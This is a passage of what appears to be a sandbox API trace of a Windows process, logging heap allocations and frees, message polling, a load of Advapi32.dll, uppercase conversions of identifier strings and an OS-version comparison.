(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.676] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.676] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.676] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.677] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0190.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.677] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.678] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.679] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.680] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.682] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.684] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0190.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.685] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.685] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.685] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.686] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: 